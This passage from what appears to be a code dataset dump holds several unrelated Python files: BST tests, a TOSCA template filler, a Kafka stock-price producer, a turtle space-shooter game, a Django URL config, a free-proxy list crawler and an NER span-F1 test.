kvtn.create(1)\n\n\n def three_tree():\n return kvtn.create(10, kvtn.create(5), kvtn.create(15))\n\n # member\n unit_member(None, 1, False, 'on empty tree')\n unit_member(small_tree(), 1, True, 'on one node tree containing data value')\n unit_member(small_tree(), 2, False, 'on one node tree not containing data value')\n unit_member(three_tree(), 1, False, 'on three node tree without data value')\n unit_member(three_tree(), 7, False, 'on three node tree without data value')\n unit_member(three_tree(), 12, False, 'on three node tree without data value')\n unit_member(three_tree(), 17, False, 'on three node tree without data value')\n unit_member(three_tree(), 5, True, 'on three node tree containing data value')\n unit_member(three_tree(), 10, True, 'on three node tree containing data value')\n unit_member(three_tree(), 15, True, 'on three node tree containing data value')\n\n # insert\n unit_insert(None, 1, True, 'inserting into empty tree')\n unit_insert(small_tree(), 1, False, 'on one node tree containing data value')\n unit_insert(small_tree(), 0, True, 'on one node tree not containing data value (left insert)')\n unit_insert(small_tree(), 2, True, 'on one node tree not containing data value (right insert)')\n unit_insert(three_tree(), 7, True, 'inserting into three node tree without data')\n unit_insert(three_tree(), 12, True, 'inserting into three node tree without data')\n unit_insert(three_tree(), 17, True, 'inserting into three node tree without data')\n unit_insert(three_tree(), 5, False, 'inserting into three node tree with data')\n unit_insert(three_tree(), 10, False, 'inserting into three node tree with data')\n unit_insert(three_tree(), 15, False, 'inserting into three node tree with data')\n\n # delete\n unit_delete(None, 1, False, 'on empty tree')\n unit_delete(small_tree(), 5, False, 'on tree without data value')\n unit_delete(small_tree(), 1, True, 'on tree with data value')\n unit_delete(three_tree(), 1, False, 'deleting from three node tree without data value')\n unit_delete(three_tree(), 7, False, 'deleting from three node tree without data value')\n unit_delete(three_tree(), 12, False, 'deleting from three node tree without data value')\n unit_delete(three_tree(), 17, False, 'deleting from three node tree without data value')\n unit_delete(three_tree(), 5, True, 'deleting from three node tree with data value')\n unit_delete(three_tree(), 10, True, 'deleting from three node tree with data value')\n unit_delete(three_tree(), 15, True, 'deleting from three node tree with data value')\n\n\n def integration(unique, unknown, deleted, retained):\n \"\"\"\n Purpose: To test the integration of member, insert, delete.\n Preconditions:\n :param unique: A list of unique values to insert into a tree\n :param unknown: A list of values not in the tree\n :param deleted: A list of values to be deleted\n :param retained: A list of values that should still be in the tree at the end\n Return:\n :return: none\n \"\"\"\n # start with an empty primitive tree\n atree = None\n\n # add all the unique values\n for v in unique:\n # first, the value should not already be in the tree\n fm = member_prim(atree, v)\n if fm:\n print(\"Integration Test error: member_prim returned:\", fm, 'unique value', v, 'already in tree')\n\n # now the value gets inserted\n fi, atree = insert_prim(atree, v)\n if not fi:\n print(\"Integration Test error: insert_prim returned:\", fi, 'unique value', v, 'already inserted')\n\n # after insert, the value should be there\n fm = member_prim(atree, v)\n if not fm:\n print(\"Integration Test error: member_prim returned:\", fm, 'unique value', v,\n 'inserted but not in tree')\n\n # check them all after all the insertions are done\n for v in unique:\n fm = member_prim(atree, v)\n if not fm:\n print(\"Integration Test error: member_prim returned:\", fm, 'unique value', v,\n 'inserted but not in tree')\n\n # check unknown values\n for v in unknown:\n # first check that member can't find it\n fm = member_prim(atree, v)\n if fm:\n print(\"Integration Test error: member_prim returned:\", fm, 'unknown value', v, 'found in tree')\n\n # now check that delete can't delete it\n fd, atree = delete_prim(atree, v)\n if fd:\n print(\"Integration Test error: delete_prim returned:\", fd, 'deleting unknown value', v)\n\n # delete a bunch of values that should be in the tree by now\n for v in deleted:\n # first check they are there\n fm = member_prim(atree, v)\n if not fm:\n print(\"Integration Test error: member_prim returned:\", fm, 'deleting value', v, 'not found in tree')\n\n # now delete it\n fd, atree = delete_prim(atree, v)\n if not fd:\n print(\"Integration Test error: delete_prim returned:\", fd, 'deleting value', v, 'failed')\n\n # now check that member can't find it anymore\n fm = member_prim(atree, v)\n if fm:\n print(\"Integration Test error: member_prim returned:\", fm, 'deleted value', v, 'found in tree')\n\n # last, check those that should be remaining\n for v in retained:\n fm = member_prim(atree, v)\n if not fm:\n print(\"Integration Test error: member_prim returned:\", fm, 'retained value', v, 'not in tree')\n\n\n # integration testing\n integration([1, 2], [4], [1], [2])\n integration([1, 2], [4], [1, 2], [])\n integration([2, 1, 3], [4], [1, 2, 3], [])\n integration([10, 5, 15, 3, 6, 9, 12, 17], [4, 2, -1], [10, 5, 15, 3, 6, 9, 12, 17], [])\n integration(sorted([10, 5, 15, 3, 6, 9, 12, 17]), [4, 2, -1], [10, 5, 15, 3, 6, 9, 12, 17], [])\n integration([10, 5, 15, 3, 6, 9, 12, 17], [4, 2, -1], sorted([10, 5, 15, 3, 6, 9, 12, 17]), [])\n integration(reversed([10, 5, 15, 3, 6, 9, 12, 17]), [4, 2, -1], [10, 5, 15, 3, 6, 9, 12, 17], [])\n integration(reversed(sorted([10, 5, 15, 3, 6, 9, 12, 17])), [4, 2, -1], reversed([10, 5, 15, 3, 6, 9, 12, 17]), [])\n\n import random as rand\n\n limit = 10000\n many = 20\n first = many // 5\n second = 2 * first\n third = 3 * first\n fourth = 4 * first\n data = rand.sample(range(-limit, limit), many)\n\n integration(data[:third], data[third:fourth], data[first:second], data[:first])\n integration(sorted(data[:third]), data[third:fourth], data[first:second], data[:first])\n integration(data[:third], data[third:fourth], sorted(data[first:second]), data[:first])\n","sub_path":"assignments/a6/a6q3.py","file_name":"a6q3.py","file_ext":"py","file_size_in_byte":14135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"95857392","text":"\"\"\"\n-to-TOSCA Template\n--------------------------------------\nCreate a complete TOSCA template from some config file using specialised adaptors\n\nSome key terminology:\n * Config file - The configuration file which should be translated into TOSCA\n * Base TOSCA Template - The working, mostly complete TOSCA with placeholders\n formatted as in place of values needing replacing\n\"\"\"\nimport importlib\nimport os\n\nfrom .settings import ADAPTOR_IMPORT_PATH, NEW_TOSCA_PATH\n\ndef adaptor_init(adaptor_import_path):\n \"\"\" Initialise the adaptor\n\n Import and returns the class provided by ADAPTOR_IMPORT_PATH in settings.py\n \"\"\"\n\n # Separate the class from the end of the import path\n adaptor_module, adaptor_class = os.path.splitext(adaptor_import_path)\n\n # Try to import the module and return the class\n try:\n module = importlib.import_module(adaptor_module)\n adaptor = getattr(module, adaptor_class.strip('.'))\n except (ImportError, AttributeError):\n raise\n else:\n return adaptor()\n\ndef write_new_tosca(base_tosca_path, new_tosca_path, fields_to_replace):\n \"\"\" Create the newly filled TOSCA template\n\n Find placeholders in the base TOSCA template and replace them with new\n values provided by the adaptor having parsed the proprietary config file\n \"\"\"\n errors = False\n\n # Open a pair of files (in/out)\n with open(new_tosca_path, 'w') as output_file:\n with open(base_tosca_path) as input_file:\n\n # Make replacements based on the dictionary generated by adaptor\n for line in input_file:\n for placeholder, value in fields_to_replace.items():\n\n # Handle lists, dicts and empty keys\n if isinstance(value, (list, dict, int, float)):\n value = str(value)\n elif not isinstance(value, str):\n errors = True\n value = \"!KEYNOTFOUND\"\n\n # Replace and write\n line = line.replace(\"<{}>\".format(placeholder), value)\n output_file.write(line)\n\n # Append a \"log\" to the end of the generated TOSCA\n output_file.write(\"\\n# This TOSCA template has been filled automatically\")\n if errors:\n output_file.write(\"\\n# WARNING: placeholders not filled\"\n \"\\n# !KEYNOTFOUND error - check your adaptor/TOSCA\")\n\n\n\nclass Template():\n \"\"\" The Template class\n\n Instantiate an adaptor and call its translate() method. Use the returned\n dictionary to make replacements to the \"base TOSCA template\" defined\n by the adaptor. Write a new TOSCA template to file.\n\n :param string path_to_config_file: Path to the file to translate into TOSCA\n\n \"\"\"\n\n def __init__(self, path_or_data, manual_entries=None):\n \"\"\" Get the substitution dictionary \"\"\"\n\n self.tosca_out = NEW_TOSCA_PATH\n adaptor_import_path = ADAPTOR_IMPORT_PATH\n\n adaptor = adaptor_init(adaptor_import_path)\n self.base_tosca_path = adaptor.base_tosca_path\n self.fields_to_replace = adaptor.translate(path_or_data)\n\n if isinstance(manual_entries, dict):\n self.fields_to_replace.update(manual_entries)\n\n def maketosca(self, tosca_out=None):\n \"\"\" Write the template out to a file \"\"\"\n if tosca_out:\n self.tosca_out = tosca_out\n write_new_tosca(self.base_tosca_path, self.tosca_out, self.fields_to_replace)\n","sub_path":"totosca/template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":3511,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"647509908","text":"import yfinance as yf\r\nimport time\r\nimport pandas as pd\r\nfrom kafka import KafkaProducer\r\nfrom json import dumps\r\n\r\ndef kafka_producer():\r\n producer = KafkaProducer(bootstrap_servers=['54.196.246.52:9115'], # change ip and port number here\r\n value_serializer=lambda x:\r\n dumps(x).encode('utf-8'))\r\n\r\n tickers = [\"AAPL\", \"GOOGL\", \"AMZN\"]\r\n\r\n t_end = time.time() + 60 * 1 # Amount of time data is sent for in seconds\r\n data_frames = [] # Create a list to store DataFrames\r\n while time.time() < t_end:\r\n data = []\r\n for ticker in tickers:\r\n stock = yf.Ticker(ticker)\r\n quote = stock.info\r\n new_row = {\r\n \"Name\": ticker,\r\n \"Price\": quote[\"regularMarketOpen\"],\r\n \"Timestamp\": time.time()\r\n }\r\n data.append(new_row)\r\n df_stream = pd.DataFrame(data)\r\n data_frames.append(df_stream) # Append each DataFrame to the list\r\n producer.send('StockData', value=df_stream.to_json(orient='records')) # Send the DataFrame as JSON\r\n # Concatenate all DataFrames before exiting the loop\r\n final_df = pd.concat(data_frames, ignore_index=True)\r\n print(final_df)\r\n print(\"done producing\")\r\n\r\nkafka_producer()\r\n","sub_path":"ECE5984-SS Data Engineering Project/Project/produce.py","file_name":"produce.py","file_ext":"py","file_size_in_byte":1310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"344015236","text":"#from Benchmark import *\n\nCONTRACT_SIZE_DICT = {'IC': 200, 'IF': 300, 'IH': 300}\nINDEX_ID_DICT = {'IC': 'SH000905', 'IF': 'SH000300', 'IH': 'SH000016'}\n\nmain_future_id_dict = {}\nclose_price_df_dict_from_TS = {}\nfuture_settlment_dict_from_TS = {}\nall_stock_id_list = []\n\nhistory_values_series = {}\n\n\nclass Computed_Trading_Days:\n computed_last_days = '2000-01-01'\n trading_days = set() # 保存查询到的结果\n\nrt_prices = {}\ncurrent_value_sum = 0.0\nstockPositionValueSeries = []\noneMinPricesDict = {}\ntodayOneMinPricesDict = {}\nstock_id_name_map = {}\n\n#benchmark_IC = BenchmarkIndexIC_Future()\n#benchmark_IF = BenchmarkIndexIF_Future()\n#benchmark_IH = BenchmarkIndexIH_Future()\n#benchmark_IC_realtime = BenchmarkIndexIC_Future(history=False)\n#benchmark_IF_realtime = BenchmarkIndexIF_Future(history=False)\n#benchmark_IH_realtime = BenchmarkIndexIH_Future(history=False)\n#\n#index_IC = BenchmarkIndexIC()\n#index_IF = BenchmarkIndexIF()\n#index_IH = BenchmarkIndexIH()\n#\n#index_IC_realtime = BenchmarkIndexIC(history=False)\n#index_IF_realtime = BenchmarkIndexIF(history=False)\n#index_IH_realtime = BenchmarkIndexIH(history=False)\n\n\n\n \n ","sub_path":"src/GlobalVars.py","file_name":"GlobalVars.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"48592772","text":"# encoding: utf-8\n\"\"\"\n@author: Yuxian Meng\n@contact: yuxian_meng@shannonai.com\n\n@version: 1.0\n@file: test_span_f1\n@time: 2019/11/19 16:38\n\n 这一行开始写关于本文件的说明与解释\n\"\"\"\n\nfrom typing import List, Dict\nfrom bert_ner.metrics.span_f1 import mask_span_f1\nimport numpy as np\n\n\ndef test_span_f1():\n \"\"\"test span f1\"\"\"\n batch_preds = [[0, 1, 2, 0, 0]]\n batch_labels = [[0, 1, 2, 0, 3]]\n batch_masks = None\n label_list: List[str] = [\"O\", \"B-I\", \"E-I\", \"S-P\"]\n\n # all tags\n span_f1 = mask_span_f1(batch_preds=batch_preds, batch_labels=batch_labels,\n batch_masks=batch_masks, label_list=label_list)\n\n golden = {'span-precision': 1.0,\n 'span-recall ': 0.5,\n 'span-f1': 2/3}\n\n assert dict_equal(span_f1, golden)\n\n # specific tags\n span_f1 = mask_span_f1(batch_preds=batch_preds, batch_labels=batch_labels,\n batch_masks=batch_masks, label_list=label_list,\n specific_tags=[\"I\"])\n golden = {'span-precision': 1.0,\n 'span-recall ': 1.0,\n 'span-f1': 1.0}\n assert dict_equal(span_f1, golden)\n\n\ndef dict_equal(dic1: Dict, dic2: Dict) -> bool:\n \"\"\"compare two dicts\"\"\"\n dic1_keys = set(dic1.keys())\n dic2_keys = set(dic2.keys())\n if dic1_keys != dic2_keys:\n return False\n dic1_lst = []\n dic2_lst = []\n for key in dic1_keys:\n dic1_lst.append(dic1[key])\n dic2_lst.append(dic2[key])\n if np.allclose(np.array(dic1_lst), np.array(dic2_lst)):\n return True\n return False\n","sub_path":"tests/metrics/test_span_f1.py","file_name":"test_span_f1.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"368145569","text":"import os\nimport random\nimport turtle\nimport time\n#import subprocess\n\n#quickfart = \"/Users/tlg/Documents/spaceWar/quickfart.wav\"\nlevel = 1\n\nturtle.fd(0)\nturtle.speed(0)\nturtle.bgcolor(\"black\")\nturtle.title(\"SpaceWar\")\n#turtle.bgpic(\"space.gif\")\nturtle.ht()\nturtle.setundobuffer(1)\n\nturtle.tracer(0)\n\nturtle.register_shape(\"dad.gif\")\n\nenemyShape = \"circle\"\n\n\nclass Sprite(turtle.Turtle):\n def __init__(self, spriteshape, color, startx, starty):\n turtle.Turtle.__init__(self, shape = spriteshape)\n self.speed(0)\n self.penup()\n self.color(color)\n self.fd(0)\n self.goto(startx, starty)\n self.speed = 1\n\n def move(self):\n self.fd(self.speed)\n \n #boundary detection\n if self.xcor() > 290:\n self.setx(290)\n self.rt(60)\n if self.xcor() < -290:\n self.setx(-290)\n self.rt(60)\n if self.ycor() > 290:\n self.sety(290)\n self.rt(60)\n if self.ycor() < -290:\n self.sety(-290)\n self.rt(60)\n\n #check sprite collision\n def is_collision(self, other):\n if (self.xcor() >= (other.xcor() - 20)) and \\\n (self.xcor() <= (other.xcor() + 20)) and \\\n (self.ycor() >= (other.ycor() - 20)) and \\\n (self.ycor() <= (other.ycor() + 20)):\n return True\n else:\n return False\n\n \n\nclass Player(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.shapesize(stretch_wid=0.6, stretch_len=1.1, outline=None)\n self.speed = 4\n self.lives = 3\n\n\n def turn_left(self):\n self.lt(20)\n \n def turn_right(self):\n self.rt(20)\n\n def accelerate(self):\n self.speed += 1\n\n def decelerate(self):\n self.speed -= 1\n\nclass Enemy(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.speed = 6\n self.setheading(random.randint(0, 360))\n\nclass Ally(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.speed = 8\n self.setheading(random.randint(0, 360))\n\n def move(self):\n self.fd(self.speed)\n \n #boundary detection\n if self.xcor() > 290:\n self.setx(290)\n self.lt(60)\n if self.xcor() < -290:\n self.setx(-290)\n self.lt(60)\n if self.ycor() > 290:\n self.sety(290)\n self.lt(60)\n if self.ycor() < -290:\n self.sety(-290)\n self.lt(60)\n \nclass Missile(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.shapesize(stretch_wid = 0.2, stretch_len = 0.4, outline=None)\n self.speed = 20\n self.status = \"ready\"\n #self.goto(-1000, 1000)\n \n\n def fire(self):\n if self.status == \"ready\":\n #subprocess.call([\"afplay\", \"/Users/tlg/Documents/spaceWar/quickfart.wav\"])\n #os.system(\" afplay /Users/tlg/Documents/spaceWar/quickfart.wav$\")\n self.goto(player.xcor(), player.ycor())\n self.setheading(player.heading())\n self.status = \"firing\"\n\n def move(self):\n if self.status == \"ready\":\n self.goto(1000, -1000)\n \n \n if self.status == \"firing\":\n self.fd(self.speed)\n\n #border check\n \n if self.xcor() > 290 or self.xcor() < -290 or\\\n self.ycor() > 290 or self.ycor() < -290:\n #self.goto(-1000, 1000)\n self.status = \"ready\"\n\nclass Particle(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.shapesize(stretch_wid = 0.1, stretch_len = 0.1, outline=None)\n self.goto(-1000,-1000)\n self.frame = 0\n\n def explode(self, startx, starty):\n self.goto(startx, starty)\n self.setheading(random.randint(0, 360))\n self.frame = 1\n\n def move(self):\n if self.frame > 0:\n self.fd(10)\n self.frame += 1\n if self.frame > 50:\n self.frame = 0\n self.goto(-1000, -1000)\n if self.xcor() > 290 or self.xcor() < -290 or\\\n self.ycor() > 290 or self.ycor() < -290:\n #self.goto(-1000, 1000)\n self.lt(random.randint(0, 270))\n\nclass Trail(Sprite):\n def __init__(self, spriteshape, color, startx, starty):\n Sprite.__init__(self, spriteshape, color, startx, starty)\n self.shapesize(stretch_wid = 0.1, stretch_len = 0.1, outline=None)\n self.goto(-1000,-1000)\n self.state = \"find\"\n self.frame = 0\n \n\n def follow(self, other):\n if self.state == \"find\":\n self.state = \"freeze\"\n self.setheading(player.heading() - 178 + random.randint(0, 4))\n x = other.xcor()\n y = other.ycor()\n self.goto(x, y)\n \n \n \n if self.state == \"freeze\":\n self.fd(random.randint(1, 10))\n self.frame += 1\n if self.frame > 10:\n self.state = \"find\"\n self.frame = 0\n self.goto(-1000, -1000)\n \n \n \nclass Game():\n def __init__(self):\n self.level = 1\n self.score = 0\n self.state = \"playing\"\n self.pen = turtle.Turtle()\n self.lives = 3\n\n def draw_border(self):\n #draw border\n self.pen.speed(0)\n self.pen.color(\"white\")\n self.pen.pensize(3)\n self.pen.penup()\n self.pen.goto(-300, 300)\n self.pen.pendown()\n for side in range(4):\n self.pen.fd(600)\n self.pen.rt(90)\n self.pen.penup()\n self.pen.ht()\n self.pen.pendown()\n\n def show_status(self):\n if self.score >= 500:\n self.level = 2\n self.pen.undo()\n msg = \"Score: %s Level: %s\" %(self.score, self.level)\n self.pen.penup()\n self.pen.goto(-300, 310)\n self.pen.write(msg, font=(\"Arial\", 16, \"normal\"))\n\n\n\n#create game object\ngame = Game()\n\n#draw the game border\ngame.draw_border()\n\n#show game status\ngame.show_status()\n\n\n#create my sprites\nplayer = Player(\"triangle\", \"white\", 0, 0)\n\n#enemy = Enemy(\"circle\", \"red\", 100, 100)\n\nmissile = Missile(\"triangle\", \"yellow\", 1000, -1000)\n\n# ally = Ally(\"square\", \"blue\", 0, 0)\ntrails = []\nfor trail in range(20):\n trails.append(Trail(\"circle\", \"grey\", -1000, -1000))\n\nallies = []\nfor i in range(6):\n allies.append(Ally(\"square\", \"blue\", -100, -100))\n\nenemies = []\nif game.level == 1:\n for i in range(6):\n enemies.append(Enemy(\"circle\", \"red\", 100, 100))\n \nparticles = []\nfor i in range(20):\n particles.append(Particle(\"circle\", \"orange\", 0, 0))\n\n\n#keyboard bindings\nturtle.onkey(player.turn_left, \"Left\")\nturtle.onkey(player.turn_right, \"Right\")\nturtle.onkey(player.accelerate, \"Up\")\nturtle.onkey(player.decelerate, \"Down\")\nturtle.onkey(missile.fire, \"space\")\nturtle.listen()\n\n\n#main game loop\nwhile True:\n if game.level == 1:\n gamespeed = 0.05\n if game.level == 2:\n gamespeed = 0.03\n turtle.update()\n time.sleep(gamespeed)\n\n # enemy.move()\n player.move()\n missile.move()\n # ally.move()\n\n for trail in trails:\n trail.follow(player)\n \n \n \n for particle in particles:\n particle.move()\n \n for ally in allies:\n ally.move()\n if missile.is_collision(ally):\n x = random.randint(-250, 250)\n y = random.randint(-250, 250)\n ally.goto(x, y)\n missile.status = \"ready\"\n ally.setheading(random.randint(0, 360))\n #decrease score\n game.score -= 50\n game.show_status()\n \n for enemy in enemies:\n enemy.move()\n \n #check for collision\n if player.is_collision(enemy):\n \n x = random.randint(-250, 250)\n y = random.randint(-250, 250)\n player.goto(x, y)\n player.setheading(random.randint(0, 360))\n game.score -= 100\n game.show_status()\n\n if missile.is_collision(enemy):\n x = random.randint(-250, 250)\n y = random.randint(-250, 250)\n enemy.goto(x, y)\n missile.status = \"ready\"\n enemy.setheading(random.randint(0, 360))\n #increase score\n game.score += 100\n game.show_status()\n\n for particle in particles:\n particle.explode(missile.xcor(), missile.ycor())\n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"pythonPractice/spaceWar/spaceWar.py","file_name":"spaceWar.py","file_ext":"py","file_size_in_byte":8994,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"460663386","text":"from django.contrib import admin\nfrom django.urls import path,include\nadmin.site.site_header=\"Code Hospital DataBase\"\nadmin.site.site_title=\"ravan database\"\nadmin.site.index_title=\"Hello Aman Welcome Missing You\"\n\n\nurlpatterns = [\n path('admin/', admin.site.urls),\n path('',include('priceprediction.urls'))\n]\n","sub_path":"djangoportion/housing/housing/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"157839806","text":"import json\nimport re\nfrom datetime import datetime, date, timedelta\nfrom .utils import get_page\nfrom pyquery import PyQuery as pq\nfrom scrapy import Selector\n\n\nclass ProxyMetaclass(type):\n def __new__(cls, name, bases, attrs):\n count = 0\n attrs['__CrawlFunc__'] = []\n for k, v in attrs.items():\n if k.partition('_')[-1] in ['ip3366', 'daili66', 'iphai', 'xicidaili']:\n continue\n if 'crawl_' in k:\n attrs['__CrawlFunc__'].append(k)\n count += 1\n attrs['__CrawlFuncCount__'] = count\n return type.__new__(cls, name, bases, attrs)\n\n\nclass Crawler(object, metaclass=ProxyMetaclass):\n def get_proxies(self, callback):\n proxies = []\n for proxy in eval(\"self.{}()\".format(callback)):\n # print(type(proxy))\n if isinstance(proxy, list):\n for pro in proxy:\n print('成功获取到代理list', pro)\n proxies.append(pro)\n elif isinstance(proxy, str):\n print('成功获取到代理str', proxy)\n proxies.append(proxy)\n\n return proxies\n \n def crawl_daili66(self, page_count=4):\n \"\"\"\n 获取代理66\n 此网站已停止维护——20201216\n :param page_count: 页码\n :return: 代理\n \"\"\"\n start_url = 'http://www.66ip.cn/{}.html'\n urls = [start_url.format(page) for page in range(1, page_count + 1)]\n for url in urls:\n print('Crawling', url)\n html = get_page(url)\n if html:\n doc = pq(html)\n trs = doc('.containerbox table tr:gt(0)').items()\n for tr in trs:\n ip = tr.find('td:nth-child(1)').text()\n port = tr.find('td:nth-child(2)').text()\n yield ':'.join([ip, port])\n\n # def crawl_ip3366(self):\n # for page in range(1, 4):\n # start_url = 'http://www.ip3366.net/free/?stype=1&page={}'.format(page)\n # html = get_page(start_url)\n # ip_address = re.compile('\\s*(.*?)\\s*(.*?)')\n # # \\s * 匹配空格,起到换行作用\n # re_ip_address = ip_address.findall(html)\n # for address, port in re_ip_address:\n # result = address+':'+ port\n # yield result.replace(' ', '')\n \n def crawl_kuaidaili(self):\n for i in range(1, 4):\n start_url = 'http://www.kuaidaili.com/free/inha/{}/'.format(i)\n html = get_page(start_url)\n if html:\n ip_address = re.compile('(.*?)') \n re_ip_address = ip_address.findall(html)\n port = re.compile('(.*?)')\n re_port = port.findall(html)\n for address,port in zip(re_ip_address, re_port):\n address_port = address+':'+port\n yield address_port.replace(' ','')\n\n def crawl_xicidaili(self):\n '''\n 网站已停止维护——20201216\n :return:\n '''\n for i in range(1, 3):\n start_url = 'http://www.xicidaili.com/nn/{}'.format(i)\n headers = {\n 'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Cookie':'_free_proxy_session=BAh7B0kiD3Nlc3Npb25faWQGOgZFVEkiJWRjYzc5MmM1MTBiMDMzYTUzNTZjNzA4NjBhNWRjZjliBjsAVEkiEF9jc3JmX3Rva2VuBjsARkkiMUp6S2tXT3g5a0FCT01ndzlmWWZqRVJNek1WanRuUDBCbTJUN21GMTBKd3M9BjsARg%3D%3D--2a69429cb2115c6a0cc9a86e0ebe2800c0d471b3',\n 'Host':'www.xicidaili.com',\n 'Referer':'http://www.xicidaili.com/nn/3',\n 'Upgrade-Insecure-Requests':'1',\n }\n html = get_page(start_url, options=headers)\n if html:\n find_trs = re.compile('(.*?)', re.S)\n trs = find_trs.findall(html)\n for tr in trs:\n find_ip = re.compile('(\\d+\\.\\d+\\.\\d+\\.\\d+)') \n re_ip_address = find_ip.findall(tr)\n find_port = re.compile('(\\d+)')\n re_port = find_port.findall(tr)\n for address,port in zip(re_ip_address, re_port):\n address_port = address+':'+port\n yield address_port.replace(' ','')\n \n def crawl_ip3366(self):\n '''\n 此网站已经不再维护 ——20201216\n :return:\n '''\n for i in range(1, 4):\n start_url = 'http://www.ip3366.net/?stype=1&page={}'.format(i)\n html = get_page(start_url)\n if html:\n find_tr = re.compile('(.*?)', re.S)\n trs = find_tr.findall(html)\n for s in range(1, len(trs)):\n find_ip = re.compile('(\\d+\\.\\d+\\.\\d+\\.\\d+)')\n re_ip_address = find_ip.findall(trs[s])\n find_port = re.compile('(\\d+)')\n re_port = find_port.findall(trs[s])\n for address,port in zip(re_ip_address, re_port):\n address_port = address+':'+port\n yield address_port.replace(' ','')\n \n def crawl_iphai(self):\n '''\n 网站已停止维护——20201216\n :return:\n '''\n start_url = 'http://www.iphai.com/'\n html = get_page(start_url)\n if html:\n find_tr = re.compile('(.*?)', re.S)\n trs = find_tr.findall(html)\n for s in range(1, len(trs)):\n find_ip = re.compile('\\s+(\\d+\\.\\d+\\.\\d+\\.\\d+)\\s+', re.S)\n re_ip_address = find_ip.findall(trs[s])\n find_port = re.compile('\\s+(\\d+)\\s+', re.S)\n re_port = find_port.findall(trs[s])\n for address,port in zip(re_ip_address, re_port):\n address_port = address+':'+port\n yield address_port.replace(' ','')\n\n def crawl_data5u(self):\n # start_url = 'http://www.data5u.com/free/gngn/index.shtml'\n start_url = 'http://www.data5u.com/'\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive',\n 'Cookie': 'JSESSIONID=47AA0C887112A2D83EE040405F837A86',\n 'Host': 'www.data5u.com',\n # 'Referer': 'http://www.data5u.com/free/index.shtml',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',\n }\n html = get_page(start_url, options=headers)\n if html:\n # ip_address = re.compile('
  • (\\d+\\.\\d+\\.\\d+\\.\\d+)
  • .*?
  • (\\d+)
  • ', re.S)\n # re_ip_address = ip_address.findall(html)\n # for address, port in re_ip_address:\n # result = address + ':' + port\n # yield result.replace(' ', '')\n select = Selector(text=html)\n lis = select.xpath('//ul/li//ul[@class=\"l2\"]')\n if len(lis):\n # ips = []\n for li in lis:\n host = li.xpath('.//span[1]/li/text()').extract_first()\n port = li.xpath('.//span[2]/li/text()').extract_first()\n # print(host, ':', port)\n yield host + ':' + port\n\n\n def crawl_data5u_2(self):\n '''\n 获取‘每日免费代理’通知中心的公告内的代理信息\n :return:\n '''\n headers = {\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',\n 'Cache-Control': 'max-age=0',\n 'Connection': 'keep-alive',\n 'Cookie': 'JSESSIONID=47AA0C887112A2D83EE040405F837A86',\n 'Host': 'www.data5u.com',\n # 'Referer': 'http://www.data5u.com/free/index.shtml',\n 'Upgrade-Insecure-Requests': '1',\n 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.108 Safari/537.36',\n }\n yesterday = date.today() + timedelta(days=-1)\n today = date.today()\n url_x = ['isp', 'http', 'https', 'province']\n url_base = 'http://www.data5u.com/freeip/{}-{}.html'\n urls_yesterday = []\n urls_today = []\n urls = []\n for i in url_x:\n urls_yesterday = url_base.format(yesterday, i)\n urls_today = url_base.format(today, i)\n # print(url)\n urls.extend([urls_yesterday, urls_today])\n for url in urls:\n html = get_page(url, options=headers)\n if html:\n pattern = '\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}:\\d{1,4}'\n pattern_com = re.compile(pattern, re.S)\n ips = re.findall(pattern_com, html)\n # print(ips)\n if ips:\n yield ips\n\n\n\n ","sub_path":"proxypool/crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":9526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"166794578","text":"#!/anaconda3/bin/python\n\n# Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def sortedArrayToBST(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: TreeNode\n \"\"\"\n if nums:\n length = len(nums)\n root = TreeNode(nums[length / 2])\n self.toBST(nums, root, length / 2, 0, length - 1)\n return root\n\n def toBST(self, 